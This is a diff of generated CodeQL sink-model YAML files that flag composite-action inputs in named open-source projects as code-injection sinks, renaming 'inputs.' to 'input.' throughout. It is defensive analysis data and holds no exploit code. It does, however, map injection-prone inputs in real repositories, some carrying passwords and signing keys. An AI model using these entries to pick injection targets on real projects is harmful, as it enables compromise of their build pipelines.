--- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 042ca09efa6..e3028cc1bb3 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 51d4903fbb1..ab112bb5ec0 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", 
"input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 12dc3005260..0d8ae4e102e 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index dfe3b7f4332..44156ddd670 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 663fada6df9..693d456e4a5 100644 
--- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 4a53345e6e5..5e3dffbb7f5 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 0a18189242d..5d782529f7f 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 93ec3ea468d..f7f845ac28f 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 27f5af98f89..a58f033cc38 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 125dd8324d2..aefece4bebd 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index dfa24454444..5cbcfc01879 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 9469e745ffc..0712838a737 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 6e34a2cf592..5ab14ba453b 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - 
["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 4ea72b28476..564961fc600 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index a0b7bca54ad..8876184a0c1 100644 
--- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 816a18fe73b..7a389e89e53 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index bf8cbfc01e0..ca23beb6e04 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] - - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index bf88ed5c0a1..9ddc6606a6d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index 05c2a1cfaf6..cd04e9c8b34 100644 
--- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 46a8fd4fb8b..d986c331226 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] - - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 32467f8c3f2..9b30c6599c1 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] - - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 3f4cc69ba75..0089d9ca75d 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index 8b8ebf88b46..d64d7c38a01 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] - - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 4bc0d5f660d..55a87e2df67 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] - - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 5f38860c86d..158aafbd115 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] - - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 3122d89f28f..ff12a54e97a 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
